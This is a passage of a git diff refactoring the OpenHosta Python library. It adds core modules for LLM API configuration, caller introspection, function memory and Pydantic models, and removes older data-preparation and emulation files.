+ if getattr(self.func.f_type[1], '__module__', None) == 'typing':
+ pass # Make a deep checking when annotated (see below)
+ return self.checked
+ # origin = get_origin(self.func.f_type[1])
+ # args = get_args(self.func.f_type[1])
+
+ # if origin != None:
+ # if origin in self.convert:
+ # convert_function = self.convert[origin]
+ # return convert_function(self.convert_to_type(d, args[0]) for d in self.checked)
+ # return self.checked
+ # else:
+ # return self.checked
+
+ def check(self) -> Any:
+ """
+ A method to check and convert the _inputs data based on the function's type annotations and Pydantic model annotations.
+
+ Returns:
+ Any: The checked and converted data. If `data` contains a "return" key, its value is used as the checked data. Otherwise, `data` is used as the checked data.
+ """
+ if self.checked == "None" or self.checked is None:
+ return None
+ if self.is_passed:
+ self.checked = self.convert(self.func.f_type[1])(self.checked)
+ self.checked = self.convert_annotated()
+ if is_pydantic:
+ from .pydantic_usage import convert_pydantic
+
+ self.checked = convert_pydantic(self.func.f_type[1], self.checked)
+ return self.checked
diff --git a/src/OpenHosta/core/config.py b/src/OpenHosta/core/config.py
new file mode 100644
index 0000000..65284b8
--- /dev/null
+++ b/src/OpenHosta/core/config.py
@@ -0,0 +1,158 @@
+from __future__ import annotations
+
+import sys
+import json
+import re
+import sys
+import requests
+from typing import Any, Dict
+
+from .checker import HostaChecker
+from .pydantic_usage import Func
+from ..utils.errors import ApiKeyError, RequestError
+
+
+def is_valid_url(url: str) -> bool:
+ regex = re.compile(
+ r"^(?:http|ftp)s?://"
+ r"(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|"
+ r"localhost|"
+ r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|"
+ r"\[?[A-F0-9]*:[A-F0-9:]+\]?)"
+ r"(?::\d+)?"
+ r"(?:/?|[/?]\S+)$",
+ re.IGNORECASE,
+ )
+ return re.match(regex, url) is not None
+
+
+class Model:
+
+ _SYS_PROMPT = ""
+
+ def __init__(self, model: str = None, base_url: str = None, api_key: str = None):
+ self.model = model
+ self.base_url = base_url
+ self.api_key = api_key
+ self._last_request = None
+ self._used_tokens = 0
+ self._nb_requests = 0
+
+ if any(var is None for var in (model, base_url)):
+ raise ValueError(f"[Model.__init__] Missing values.")
+ elif not is_valid_url(self.base_url):
+ raise ValueError(f"[Model.__init__] Invalid URL.")
+
+ def simple_api_call(
+ self,
+ sys_prompt: str,
+ user_prompt: str,
+ json_form: bool = True,
+ **llm_args
+ ) -> Dict:
+ return self.api_call(
+ [
+ {"role": "system", "content": sys_prompt},
+ {"role": "user", "content": user_prompt}
+ ],
+ json_form,
+ **llm_args
+ )
+
+ def api_call(
+ self,
+ messages: list[dict[str, str]],
+ json_form: bool = True,
+ **llm_args
+ ) -> Dict:
+ if self.api_key is None or not self.api_key:
+ raise ApiKeyError("[model.api_call] Empty API key.")
+
+ l_body = {
+ "model": self.model,
+ "messages": messages,
+ }
+ headers = {
+ "Content-Type": "application/json"
+ }
+
+ if "azure.com" in self.base_url:
+ headers |= {"api-key": f"{self.api_key}"}
+ else:
+ headers |= {"Authorization": f"Bearer {self.api_key}"}
+
+ if json_form:
+ l_body["response_format"] = {"type": "json_object"}
+ for key, value in llm_args.items():
+ l_body[key] = value
+ try:
+ response = requests.post(self.base_url, headers=headers, json=l_body, timeout=30)
+
+ if response.status_code != 200:
+ response_text = response.text
+ if "invalid_api_key" in response_text:
+ raise ApiKeyError("[Model.api_call] Incorrect API key.")
+ else:
+ raise RequestError(
+ f"[Model.api_call] API call was unsuccessful.\n"
+ f"Status code: {response.status_code }:\n{response_text}"
+ )
+ self._nb_requests += 1
+ return response.json()
+ except Exception as e:
+ raise RequestError(f"[Model.api_call] Request failed:\n{e}\n\n")
+
+ def request_handler(self, response: Dict, func: Func) -> Any:
+ json_string = response["choices"][0]["message"]["content"]
+ if "usage" in response:
+ self._used_tokens += int(response["usage"]["total_tokens"])
+ try:
+ l_ret_data = json.loads(json_string)
+ except json.JSONDecodeError as e:
+ sys.stderr.write(
+ f"[Model.request_handler] JSONDecodeError: {e}\nContinuing the process.")
+ l_cleand = "\n".join(json_string.split("\n")[1:-1])
+ l_ret_data = json.loads(l_cleand)
+ return HostaChecker(func, l_ret_data).check()
+
+
+class DefaultModel:
+ _instance = None
+
+ def __new__(cls, *args, **kwargs):
+ if cls._instance is None:
+ cls._instance = super(DefaultModel, cls).__new__(
+ cls, *args, **kwargs)
+ return cls._instance
+
+ def __init__(self):
+ if not hasattr(self, "model"):
+ self.model = None
+
+ def set_default_model(self, new):
+ if isinstance(new, Model):
+ self.model = new
+ else:
+ sys.stderr.write("[CONFIG_ERROR] Invalid model instance.\n")
+
+ def set_default_apiKey(self, api_key=None):
+ if api_key is not None or isinstance(api_key, str):
+ self.model.api_key = api_key
+ else:
+ sys.stderr.write("[CONFIG_ERROR] Invalid API key.")
+
+ def get_default_model(self):
+ return self.model
+
+
+DefaultManager = DefaultModel()
+
+
+def set_default_model(new):
+ DefaultManager.set_default_model(new)
+
+
+def set_default_apiKey(api_key=None):
+ DefaultManager.set_default_apiKey(api_key)
+
+# anntations, errors handling, doc, all
diff --git a/src/OpenHosta/core/hosta.py b/src/OpenHosta/core/hosta.py
new file mode 100644
index 0000000..37933b7
--- /dev/null
+++ b/src/OpenHosta/core/hosta.py
@@ -0,0 +1,217 @@
+from __future__ import annotations
+
+from typing import List, Optional
+
+from .analizer import FuncAnalizer
+from .inspector import HostaInspector
+from .pydantic_usage import Func
+from ..utils.errors import InvalidStructureError
+from ..utils.hosta_type import MemoryNode, MemKey, MemValue, ExampleType, CotType
+import hashlib
+
+all = (
+ "Hosta",
+ "Func",
+ "UseType",
+ "MemKey",
+ "MemValue",
+ "MemoryNode"
+)
+
+
+class Hosta(HostaInspector):
+ """
+ Hosta is a class that extends HostaInspector and provides functionality for analyzing
+ and storing information about the calling function.
+
+ This class implements a singleton pattern and uses introspection to gather details
+ about the callable that called the function that instantiated it.
+
+ If many function instantiated it in the same callable, the first function will create
+ an instance and attach it to the callable so that the next function can retrieve it.
+
+ Attributes:
+ _initialized (bool): Flag to track if the instance has been initialized.
+ _obj (tuple): Stores the result of the _extend method call.
+ _infos (Func): Stores detailed information about the analyzed function.
+ """
+ _initialized = False
+ _obj = None
+
+ def __new__(cls, *args, **kwargs) -> 'Hosta':
+ """
+ Create a new instance of Hosta or return the existing one if already created.
+
+ This method implements the singleton pattern, ensuring only one instance of Hosta exists.
+ It also handles the initialization of the instance when first created.
+
+ Args:
+ *args: Variable length argument list.
+ **kwargs: Arbitrary keyword arguments.
+ > it's the arguments passed to __init__()
+
+ Returns:
+ Hosta: The single instance of the Hosta class.
+ """
+ cls._obj = cls._extend()
+ if cls._obj[0] is None:
+ raise InvalidStructureError(
+ "[Hosta.__new__] The function {} must be called in a function/method."
+ .format(cls._extend(back_level=2)[0].__name__)
+ )
+ if (hasattr(cls._obj[0], "Hosta")):
+ return cls._obj[0].Hosta
+ instance = super().__new__(cls)
+ cls._attach(cls._obj[0], {"Hosta": instance})
+ return instance
+
+ def __init__(self, *, caller_analysis: bool = True):
+ """
+ Initialize the Hosta instance.
+
+ This method is called after __new__ and sets up the instance attributes.
+ It also triggers the function analysis if caller_analysis is True.
+
+ Args:
+ caller_analysis (bool): If True, analyze the calling function. Defaults to True.
+ """
+ if not self._initialized:
+ super().__init__()
+ self._initialized = True
+ self._infos = Func()
+ if caller_analysis:
+ self._get_infos_func()
+
+ def _get_infos_func(self) -> None:
+ """
+ Analyze and store information about the calling function.
+
+ This method uses FuncAnalizer to extract various details about the function
+ that called the Hosta instance, including its name, definition, call signature,
+ arguments, types, and local variables. This informations are useful in all OpenHosta's function.
+
+ The extracted information is stored in the _infos attribute of the instance.
+ """
+ analizer = FuncAnalizer(self._obj[0], self._obj[1])
+ self._infos.f_obj = self._obj[0]
+ self._infos.f_name = self._obj[0].__name__
+ self._infos.f_doc = self._obj[0].__doc__
+ self._infos.f_def = analizer.func_def
+ self._infos.f_call, self._infos.f_args = analizer.func_call
+ self._infos.f_type = analizer.func_type
+ self._infos.f_locals, self._infos.f_self = analizer.func_locals
+ self._infos.f_schema = analizer.func_schema
+ self._infos.f_sig = analizer.sig
+
+ def _update_call(self):
+ analizer = FuncAnalizer(self._obj[0], self._obj[1])
+ self._infos.f_call, self._infos.f_args = analizer.func_call
+ return self
+
+
+ def _bdy_add(self, key: MemKey, value: MemValue) -> None:
+ """
+ Add a new memory node to the function's memory.
+
+ This method creates a new MemoryNode with the given key and value,
+ and appends it to the function's memory list. If the memory list
+ doesn't exist, it initializes it.
+
+ Args:
+ key (MemKey): The type of memory node ('ex', 'cot', or 'use').
+ value (MemValue): The value to be stored in the memory node.
+ """
+ seen: List[MemKey] = []
+ previous: MemKey = None
+
+ if self._infos.f_mem is None:
+ self._infos.f_mem = []
+ id = 0
+ else:
+ id = 0
+ for node in self._infos.f_mem:
+ if node.key == key:
+ id += 1
+ new = MemoryNode(key=key, id=id, value=value)
+ self._infos.f_mem.append(new)
+ previous = new
+ for node in self._infos.f_mem:
+ if node.key not in seen:
+ seen.append(node.key)
+ previous = node
+ elif node.key in seen and node.key == previous.key:
+ previous = node
+ else:
+ raise InvalidStructureError(
+ "[Hosta._bdy_add] Inconsistent function structure. Place your OpenHosta functions per block.")
+
+ def _bdy_get(self, key: MemKey) -> List[MemoryNode]:
+ """
+ Retrieve memory nodes of a specific type from the function's memory.
+
+ This method searches through the function's memory list and returns
+ all nodes that match the given key.
+
+ Args:
+ key (MemKey): The type of memory node to retrieve ('ex', 'cot', or 'use').
+
+ Returns:
+ List[MemoryNode]: A list of memory nodes matching the key, or None if no matches are found.
+ """
+ l_list: List[MemoryNode] = []
+
+ if self._infos.f_mem is None:
+ return None
+ for node in self._infos.f_mem:
+ if node.key == key:
+ l_list.append(node)
+ return l_list if l_list != [] else None
+
+ @property
+ def example(self) -> Optional[List[ExampleType]]:
+ """
+ Retrieve all example nodes from the function's memory.
+
+ This property method uses _bdy_get to fetch all memory nodes with the 'ex' key.
+
+ Returns:
+ Optional[List[ExampleType]]: A list of example nodes, or None if no examples are found.
+ """
+ nodes = self._bdy_get(key="ex")
+ return [node.value for node in nodes] if nodes else None
+
+ @property
+ def cot(self) -> Optional[List[CotType]]:
+ """
+ Retrieve all chain-of-thought (cot) nodes from the function's memory.
+
+ This property method uses _bdy_get to fetch all memory nodes with the 'cot' key.
+
+ Returns:
+ Optional[List[CotType]]: A list of chain-of-thought nodes, or None if no cot nodes are found.
+ """
+ nodes = self._bdy_get(key="cot")
+ return [node.value for node in nodes] if nodes else None
+
+ @property
+ def infos(self):
+ return self._infos
+
+ @staticmethod
+ def hash_func(func: Func) -> str:
+ """
+ Generate a hash value for a function without use builtin python hash function.
+
+ This method generates a hash value for a function using a custom algorithm
+ Hashed by func.f_doc, func.f_def, func.f_call, func.f_args, func.f_type, func.f_schema, func.f_locals, func.f_self
+
+ Args:
+ func (object): The function to hash.
+
+ Returns:
+ str: The hash value of the function.
+ """
+ return hashlib.md5(
+ str(func.f_def).encode() +
+ str(func.f_type).encode()
+ ).hexdigest()
diff --git a/src/OpenHosta/core/inspector.py b/src/OpenHosta/core/inspector.py
new file mode 100644
index 0000000..ffc6819
--- /dev/null
+++ b/src/OpenHosta/core/inspector.py
@@ -0,0 +1,166 @@
+from __future__ import annotations
+
+from typing import Tuple, Callable, Optional, Dict, Any, Union
+from types import FrameType, CodeType, MethodType
+import inspect
+
+from ..utils.errors import FrameError
+
+all = (
+ "HostaInspector"
+)
+
+
+class HostaInspector:
+ """
+ This class is the parent class for a lot of OpenHosta functionnality.
+ It provides methods which are used in many cases.
+ """
+
+ def __init__(self):
+ pass
+
+ @staticmethod
+ def _extend(*, back_level: int = 3) -> Tuple[Union[Callable, MethodType], FrameType]:
+ """
+ Retrieves the callable object and the frame from which this method is called.
+
+ This method navigates up the call stack to find the function or method that called it.
+ It can retrieve the callable object from both class methods and standalone functions.
+
+ This method uses introspection to examine the call stack and local variables.
+ It may not work correctly in all execution environments or with all types of callable objects.
+
+ Args:
+ - back_level (int, optional): The number of frames to go back in the call stack.
+ Defaults to 2. Must be a non-zero positive integer.
+
+ Returns:
+ Tuple[Callable, FrameType]: A tuple containing:
+ - The callable object (function or method) that called this method.
+ - The frame object of the caller.
+ """
+ if back_level <= 0 or not isinstance(back_level, int):
+ raise ValueError(
+ f"[HostaInspector._extend] back_level must a non-zero positive integers.")
+
+ def _get_obj_from_class(caller: FrameType) -> Optional[Callable]:
+ """
+ Search for the callable object when it is called within a class method.
+
+ This function attempts to retrieve the method from the 'self' object
+ in the caller's local variables. It's designed for internal use only,
+ within the _extend method.
+
+ Args:
+ caller (FrameType): The frame object of the calling method.
+
+ Returns:
+ Callable: The unwrapped method object if found, otherwise None.
+ """
+ func: Union[Callable, MethodType]
+
+ obj = caller.f_locals["self"]
+ func = getattr(obj, caller_name, None)
+ return inspect.unwrap(func) if func else None
+
+ def _get_obj_from_func(
+ caller: FrameType,
+ code: CodeType,
+ name: str
+ ) -> Optional[Callable]:
+ """
+ Search for the callable object when it is called within a function.
+
+ This function traverses the call stack, examining local and global variables
+ to find the function that matches the given code object. It's designed for
+ internal use only, within the _extend method.
+
+ Args:
+ - caller (FrameType): The frame object of the calling function.
+ - code (CodeType): The code object of the calling function.
+ - name (str): The name of the calling function.
+
+ Returns:
+ Callable: The unwrapped function object if found, otherwise None.
+ """
+ func: Union[Callable, MethodType]
+ l_caller: FrameType = caller
+
+ while not l_caller.f_back is None:
+ for obj in l_caller.f_back.f_locals.values():
+ try:
+ if hasattr(obj, "__code__"):
+ if obj.__code__ == code:
+ return obj
+ except:
+ continue
+ l_caller = l_caller.f_back
+ func = caller.f_globals.get(name)
+ return inspect.unwrap(func) if func else None
+
+ func: Union[Callable, MethodType]
+ current: Optional[FrameType] = inspect.currentframe()
+
+ if current is None:
+ raise FrameError(
+ f"[HostaInspector._extend] Current frame can't be found")
+ for k in range(back_level):
+ current = current.f_back
+ if current is None:
+ raise FrameError(
+ f"[HostaInspector._extend] Frame can't be found (level: {k})")
+
+ caller = current
+ caller_name = caller.f_code.co_name
+ caller_code = caller.f_code
+ caller_args = inspect.getargvalues(caller)
+
+ is_likely_method = "self" in caller.f_locals or\
+ 'cls' in caller.f_locals or\
+ (caller_args.args and caller_args.args[0] in ['self', 'cls'])
+ if is_likely_method:
+ func = _get_obj_from_class(caller)
+ else:
+ func = _get_obj_from_func(caller, caller_code, caller_name)
+
+ if func is not None and not callable(func):
+ raise FrameError(
+ "[HostaInspector._extend] The foud object isn't a callable.")
+
+ return (func, caller)
+
+ @staticmethod
+ def _attach(obj: Callable, attr: Dict[str, Any]) -> Optional[bool]:
+ """
+ Attaches attributes to a function or method.
+
+ This method attempts to add new attributes to a callable object (function or method).
+ For methods, it attaches the attributes to the underlying function object.
+ Only supports attaching to functions and methods. Other callable types will raise an AttributeError.
+
+ Args:
+ - obj (Callable): The function or method to which the attribute will be attached.
+ - attr (Dict[str, Any]): The dictionary of the attributes to attach.
+
+ Return:
+ Optional[bool]: Returns True if the attribute was successfully attached, raise an Exception otherwise.
+ """
+ if not callable(obj) or not isinstance(attr, dict):
+ raise ValueError("[HostaInspector._attach] Invalid arguments")
+
+ def attr_parser(obj: Callable, attr: Dict[str, Any]) -> None:
+ for key, value in attr.items():
+ setattr(obj, key, value)
+
+ if inspect.ismethod(obj):
+ if hasattr(obj, "__func__"):
+ attr_parser(obj.__func__, attr)
+ return True
+ raise AttributeError(
+ f"[HostaInspector._attach] Failed to attach attributs. \"__func__\" attribut is missing.")
+ elif inspect.isfunction(obj):
+ attr_parser(obj, attr)
+ return True
+ raise AttributeError(
+ f"[HostaInspector._attach] Failed to attach attributs. Object's type not supported: {type(obj)}.")
diff --git a/src/OpenHosta/core/memory.py b/src/OpenHosta/core/memory.py
new file mode 100644
index 0000000..964c211
--- /dev/null
+++ b/src/OpenHosta/core/memory.py
@@ -0,0 +1,32 @@
+import os
+from typing import Optional
+
+class HostaMemory:
+ """
+ Base class for persistent memory management.
+ """
+ _instances = {}
+ CACHE_DIR = "__hostacache__"
+
+ def __init__(self, base_path: Optional[str] = None, **kwargs):
+ pass
+
+ def __new__(cls, base_path: Optional[str] = None, **kwargs):
+ if cls not in cls._instances:
+ cls._instances[cls] = super(HostaMemory, cls).__new__(cls)
+ cls._instances[cls]._initialized = False
+ if base_path is not None and not cls._instances[cls]._initialized:
+ cls._instances[cls]._initialize(base_path)
+ return cls._instances[cls]
+
+ def _initialize(self, base_path: str) -> None:
+ """Initializes the hostacache directory"""
+ self.cache_root = os.path.join(base_path, self.CACHE_DIR)
+ self._initialized = True
+ self._ensure_directory_exists(self.cache_root)
+
+
+ def _ensure_directory_exists(self, directory) -> None:
+ """Creates the base directory if necessary"""
+ if not os.path.exists(directory):
+ os.makedirs(directory)
\ No newline at end of file
diff --git a/src/OpenHosta/core/pydantic_usage.py b/src/OpenHosta/core/pydantic_usage.py
new file mode 100644
index 0000000..807e3cc
--- /dev/null
+++ b/src/OpenHosta/core/pydantic_usage.py
@@ -0,0 +1,75 @@
+from __future__ import annotations
+
+import inspect
+from typing import Optional, Dict, Tuple, List, Any, get_args, get_origin
+
+from ..utils.hosta_type import MemoryNode
+from ..utils.import_handler import is_pydantic
+
+if is_pydantic:
+ from pydantic import BaseModel, Field, ConfigDict, create_model
+
+
+ def convert_pydantic(caller, checked) -> Optional[BaseModel]:
+ """
+ A method to convert the checked data based on the Pydantic model annotations of the function.
+
+ Returns:
+ Optional[BaseModel]: The converted checked data based on the Pydantic model annotations.
+ """
+ try:
+ if issubclass(caller, BaseModel):
+ return caller(**checked)
+ return checked
+ except:
+ return checked
+
+
+ class Func(BaseModel):
+ """
+ Func is a Pydantic model representing a function's metadata.
+ Useful for the executive functions and the post-processing.
+ """
+ model_config = ConfigDict(arbitrary_types_allowed=True)
+ f_obj: Optional[object] = Field(default=None)
+ f_def: str = Field(default="", description="Simple definition of the function, e.g., 'def func(a:int, b:str)->int:'")
+ f_name: str = Field(default="", description="Name of the function, e.g., 'func'")
+ f_doc: str = Field(default="", description="Documentation of the function, e.g., 'This function returns the sum of two integers.'")
+ f_call: str = Field(default="", description="Actual call of the function, e.g., 'func(1, 'hello')'")
+ f_args: Dict[str, Any] = Field(default_factory=dict, description="Arguments of the function, e.g., {'a': 1, 'b': 'hello'}")
+ f_type: Tuple[List[Any], Any] = Field(default_factory=lambda: ([], None), description="Desired type of the _inputs and _outputs of the function")
+ f_schema: Dict[str, Any] = Field(default_factory=dict, description="Dictionary describing the function's return type (in case of pydantic).")
+ f_sig: Optional[inspect.Signature] = Field(default=None, description="Signature of the function")
+ f_locals: Optional[Dict[str, Any]] = Field(default=None, description="Local variables within the function's scope")
+ f_self: Optional[Dict[str, Any]] = Field(default=None)
+ f_mem: Optional[List[MemoryNode]] = Field(default=None, description="Memory nodes associated with the function, contains examples, chain of thought...")
+
+
+ def get_pydantic_schema(return_caller) -> Optional[Dict[str, Any]]:
+ """
+ Get the JSON schema of the function's return type.
+
+ Returns:
+ The JSON schema of the function's return type.
+ """
+ try:
+ if issubclass(return_caller, BaseModel):
+ return return_caller.model_json_schema()
+ return None
+ except:
+ return None
+
+else:
+ class Func:
+ f_obj: Optional[object] = None
+ f_def: str = ""
+ f_name: str = ""
+ f_doc: str = ""
+ f_call: str = ""
+ f_args: Dict[str, Any] = {}
+ f_type: Tuple[List[Any], Any] = ([], None)
+ f_schema: Dict[str, Any] = {}
+ f_sig: Optional[inspect.Signature] = None
+ f_locals: Optional[Dict[str, Any]] = None
+ f_self: Optional[Dict[str, Any]] = None
+ f_mem: Optional[List[MemoryNode]] = None
diff --git a/src/OpenHosta/datapreparator.py b/src/OpenHosta/datapreparator.py
deleted file mode 100644
index ad21f6d..0000000
--- a/src/OpenHosta/datapreparator.py
+++ /dev/null
@@ -1,241 +0,0 @@
-import torch
-from torch.utils.data import DataLoader
-import os
-import json
-import csv
-import numpy as np
-
-from .encoder import HostaEncoder
-from .decoder import HostaDecoder
-
-class Datapreparator():
- def __init__(self, norm_max, norm_min, encoder=None, decoder=None):
- self.encoder = encoder if encoder else HostaEncoder()
- self.decoder = decoder if decoder else HostaDecoder()
-
- if norm_min:
- self.norm_min = norm_min
- else:
- self.norm_min = 0.1
- if norm_max:
- self.norm_max = norm_max
- else:
- self.norm_max = 1.0
-
- self.data_min_nonzero = None
- self.data_max = None
- self.data_min = None
- self.data_range = None
-
- self.prediction_min_nonzero = None
- self.prediction_max = None
- self.prediction_min = None
- self.prediction_range = None
-
- def prepare_input(self, in_value):
- input_data = []
- for key, value in in_value.items():
- if isinstance(value, dict):
- for sub_key, sub_value in value.items():
- parsed_value = self.encoder.encode(sub_value)
- input_data.extend(parsed_value)
- elif isinstance(value, list):
- for item in value:
- parsed_value = self.encoder.encode(item)
- input_data.extend(parsed_value)
- else:
- parsed_value = self.encoder.encode(value)
- input_data.extend(parsed_value)
- return input_data
-
- def prepare(self, function_infos, prediction):
- train = []
- val = []
- if function_infos["ho_example"] == [] and function_infos["ho_data"] == []:
- raise ValueError("No example provided please provide at least one example for the model")
-
- if function_infos["ho_data"] != []:
- for example in function_infos["ho_data"]:
- value = self.parse_dict(example, prediction)
- train.extend(value)
- if function_infos["ho_example"] != []:
- for example in function_infos["ho_example"]:
- value = self.parse_dict(example, prediction)
- val.extend(value)
- else:
- for example in function_infos["ho_example"]:
- value = self.parse_dict(example, prediction)
- train.extend(value)
- return train, val
-
- def normalize_dataset(self, train, val):
- dataset = train + val if val != [] else train
- data_values = [example[0] for example in dataset]
- prediction_values = [example[1] for example in dataset]
-
- data_array = np.array(data_values)
- prediction_array = np.array(prediction_values)
-
- negative_data = np.any(data_array < 0, axis=0)
- negative_prediction = np.any(prediction_array < 0, axis=0)
-
- self.data_min_nonzero = np.array([
- np.min(data_array[:, i][data_array[:, i] > 0]) if not negative_data[i] and np.any(data_array[:, i] > 0) else 0
- for i in range(data_array.shape[1])])
- self.data_max = data_array.max(axis=0)
- self.data_min = data_array.min(axis=0)
-
- self.prediction_min_nonzero = np.array([
- np.min(prediction_array[:, i][prediction_array[:, i] > 0]) if not negative_prediction[i] and np.any(prediction_array[:, i] > 0) else 0
- for i in range(prediction_array.shape[1])])
- self.prediction_max = prediction_array.max(axis=0)
- self.prediction_min = prediction_array.min(axis=0)
-
- self.data_range = self.data_max - self.data_min_nonzero
- self.data_range[self.data_range == 0] = 1
-
- self.prediction_range = self.prediction_max - self.prediction_min_nonzero
- self.prediction_range[self.prediction_range == 0] = 1
-
- normalized_data = np.zeros_like(data_array)
- for i in range(data_array.shape[1]):
- zero_mask = data_array[:, i] == 0
- normalized_data[:, i] = np.where(zero_mask, 0.0, self.norm_min + ((data_array[:, i] - self.data_min_nonzero[i]) / self.data_range[i]) * (self.norm_max - self.norm_min))
-
- normalized_prediction = np.zeros_like(prediction_array)
- for i in range(prediction_array.shape[1]):
- zero_mask = prediction_array[:, i] == 0
- normalized_prediction[:, i] = np.where(zero_mask, 0.0, self.norm_min + ((prediction_array[:, i] - self.prediction_min_nonzero[i]) / self.prediction_range[i]) * (self.norm_max - self.norm_min))
-
- # Maybe unwrap the tolist, stay for now because only work after with list
- normalized_dataset = list(zip(normalized_data.tolist(), normalized_prediction.tolist()))
- train = normalized_dataset[:len(train)]
- val = normalized_dataset[len(train):] if val else None
- return train, val
-
- def normalize_inference(self, inference_data):
- inference_data = np.array(inference_data)
-
- normalized_inference = np.zeros_like(inference_data)
- for i in range(len(inference_data)):
- if inference_data[i] == 0:
- normalized_inference[i] = 0.0
- else:
- normalized_inference[i] = self.norm_min + ((inference_data[i] - self.data_min_nonzero[i]) / self.data_range[i]) * (self.norm_max - self.norm_min)
-
- return normalized_inference.tolist()
-
- def denormalize_prediction(self, prediction):
- prediction = prediction.detach().cpu().numpy()
-
- denormalized_prediction = np.zeros_like(prediction)
- for i in range(len(prediction)):
- if prediction[i] == 0:
- denormalized_prediction[i] = 0.0
- else:
- denormalized_prediction[i] = self.prediction_min_nonzero[i] + ((prediction[i] - self.norm_min) / (self.norm_max - self.norm_min)) * self.prediction_range[i]
-
- return denormalized_prediction.tolist()
-
- def save_normalization_params(self, path):
- params = {
- 'norm_min': self.norm_min,
- 'norm_max': self.norm_max,
- 'data_min_nonzero': self.data_min_nonzero.tolist(),
- 'data_max': self.data_max.tolist(),
- 'data_min': self.data_min.tolist(),
- 'data_range': self.data_range.tolist(),
- 'prediction_min_nonzero': self.prediction_min_nonzero.tolist(),
- 'prediction_max': self.prediction_max.tolist(),
- 'prediction_min': self.prediction_min.tolist(),
- 'prediction_range': self.prediction_range.tolist()
- }
- with open(path, 'w') as f:
- json.dump(params, f)
-
- def load_normalization_params(self, path):
- try:
- with open(path, 'r') as f:
- params = json.load(f)
- self.norm_min = params['norm_min']
- self.norm_max = params['norm_max']
- self.data_min_nonzero = np.array(params['data_min_nonzero'])
- self.data_max = np.array(params['data_max'])
- self.data_min = np.array(params['data_min'])
- self.data_range = np.array(params['data_range'])
- self.prediction_min_nonzero = np.array(params['prediction_min_nonzero'])
- self.prediction_max = np.array(params['prediction_max'])
- self.prediction_min = np.array(params['prediction_min'])
- self.prediction_range = np.array(params['prediction_range'])
- except Exception as e:
- raise IOError(f"An error occurred while loading the normalization parameters: {e}")
-
- def convert(self, inference):
- return torch.tensor(inference, dtype=torch.float32)
-
- def split(self, train_normalization, val_normalization, batch_size):
- datatensor = []
-
- for examples in train_normalization:
- feature_tensor = torch.tensor(examples[0], dtype=torch.float32)
- label_tensor = torch.tensor(examples[1], dtype=torch.float32)
-
- tensor = [feature_tensor, label_tensor]
- datatensor.append(tensor)
-
- train = DataLoader(datatensor, batch_size=batch_size, shuffle=True)
-
- if val_normalization:
- valtensor = []
- for examples in val_normalization:
- feature_tensor = torch.tensor(examples[0], dtype=torch.float32)
- label_tensor = torch.tensor(examples[1], dtype=torch.float32)
-
- tensor = [feature_tensor, label_tensor]
- valtensor.append(tensor)
- val = DataLoader(valtensor, batch_size=batch_size, shuffle=False)
- else : val = None
- return train, val
-
- def parse_dict(self, example, prediction):
- dataset = []
- input_data = []
- output_data = []
- for key, value in example.items():
- if key in prediction or key == "hosta_out":
- parsed_value = self.encoder.encode(value)
- output_data.extend(parsed_value)
- else:
- parsed_value = self.encoder.encode(value)
- input_data.extend(parsed_value)
- dataset.append([input_data, output_data])
- return dataset
-
-def open_file(ho_examples):
- list_of_examples = []
- for path in ho_examples:
- _, file_extension = os.path.splitext(path)
- try:
- if file_extension == '.jsonl':
- with open(path, "r") as file:
- for line in file:
- example = json.loads(line.strip())
- list_of_examples.append(example)
-
- elif file_extension == '.csv':
- with open(path, "r", newline='') as file:
- csv_reader = csv.DictReader(file)
- for row in csv_reader:
- list_of_examples.append(row)
-
- elif file_extension == '.txt':
- with open(path, "r") as file:
- for line in file:
- list_of_examples.append(line.strip())
-
- else:
- raise ValueError("Unsupported file type. Please provide a JSONL, CSV, or TXT file.")
-
- except Exception as e:
- raise IOError(f"An error occurred while processing the file: {e}")
- return list_of_examples
diff --git a/src/OpenHosta/decoder.py b/src/OpenHosta/decoder.py
deleted file mode 100644
index c76aadb..0000000
--- a/src/OpenHosta/decoder.py
+++ /dev/null
@@ -1,3 +0,0 @@
-class HostaDecoder():
- def __init__(self) -> None:
- pass
diff --git a/src/OpenHosta/emulate.py b/src/OpenHosta/emulate.py
deleted file mode 100644
index 42e25e1..0000000
--- a/src/OpenHosta/emulate.py
+++ /dev/null
@@ -1,85 +0,0 @@
-import sys
-import inspect
-
-from .prompt import PromptMananger
-from .config import Model, DefaultManager
-
-
-_x = PromptMananger()
-
-_emulator_pre_prompt = _x.get_prompt("emulate")
-
-l_default = DefaultManager.get_default_model()
-
-
-def build_user_prompt(_infos: dict = None):
- filler = lambda pre, value: f"**{pre}**\n{str(value)}\n\n" if value is not None and value != [] else ""
-
- user_prompt = (
- "---\n\n## Function infos\n\n"
- + filler("Here's the function definition:", _infos["function_def"])
- + filler("Here's the function's locals variables which you can use as additional information to give your answer:", _infos["function_locals"])
- + "To fill in the \"return\" value in the output JSON, create your response according to the specified JSON Schema. Make sure not to change the key \"return.\"\n\n"
- + filler("JSON Schema to be used for \"return\" structure", _infos["return_type"])
- + filler("Here are some examples of expected input and output:", _infos["ho_example"])
- + "---\n"
- )
-
- return user_prompt
-
-
-def _exec_emulate(
- _infos: dict = None,
- _obj: object = None,
- model: Model = None,
- l_creativity: float = None,
- l_diversity: float = None,
-):
- global _emulator_pre_prompt
-
- _function_return_caller = _infos["return_caller"]
- _function_return = _infos["return_type"]
-
- if model is None:
- model = DefaultManager.get_default_model()
-
- try:
- if not isinstance(_emulator_pre_prompt, str) or not _emulator_pre_prompt:
- raise ValueError("Invalid prompt.")
- if (l_creativity is not None and (l_creativity < 0 or l_creativity > 1)) or (
- l_diversity is not None and (l_diversity < 0 or l_diversity > 1)
- ):
- raise ValueError("Emulate out of range values (0<creativity|diversity<1)")
- except ValueError as v:
- sys.stderr.write(f"[EMULATE_ERROR]: {v}")
- return None
-
- function_infos = build_user_prompt(_infos)
-
- response = model.api_call(
- sys_prompt=f"{_emulator_pre_prompt}\n{function_infos}\n",
- user_prompt=_infos["function_call"],
- creativity=l_creativity,
- diversity=l_diversity,
- )
-
- if _obj is not None and inspect.isfunction(_obj):
- setattr(_obj, "_last_response", response.json())
-
- if response.status_code == 200:
- l_ret = model.request_handler(
- response, _function_return, _function_return_caller
- )
-
- else:
- sys.stderr.write(f"Error {response.status_code}: {response.text}")
- l_ret = None
-
- if _obj is not None and inspect.isfunction(_obj):
- setattr(
- _obj,
- "_last_request",
- f"{_emulator_pre_prompt}\n{function_infos}\n{_infos['function_call']}"
- )
-
